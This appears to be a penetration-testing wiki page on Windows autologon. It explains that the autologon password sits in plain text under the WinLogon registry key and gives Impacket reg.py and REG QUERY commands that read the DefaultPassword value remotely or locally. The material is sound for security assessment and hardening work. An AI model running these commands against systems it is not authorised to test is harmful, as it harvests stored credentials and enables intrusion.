AutoLogon Registry

Theory

By using this feature, other users can start your computer and use the account that you establish to automatically log on. The autologon feature is provided as a convenience. However, this feature may be a security risk. If you set a computer for autologon, anyone who can physically obtain access to the computer can gain access to all the computer's contents, including any networks it is connected to. Additionally, when autologon is turned on, the password is stored in the registry in plain text. The specific registry key that stores this value can be remotely read by the Authenticated Users group.

Practice

Impacket's reg.py (Python) script can be used to query registry remotely from a UNIX-like machine.

# Query all Auto logon subkeys and values
reg.py domain.local/username:password123@IP query -keyName "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" -s 

# Query Auto logon password
reg.py domain.local/username:password123@IP query -keyName "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" -v DefaultPassword

We can use the REG.EXE Windows utility

# Query Auto logon password
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword

#Or force reg.exe to read the 64-bit registry location
REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword /reg:64

Last updated 4 months ago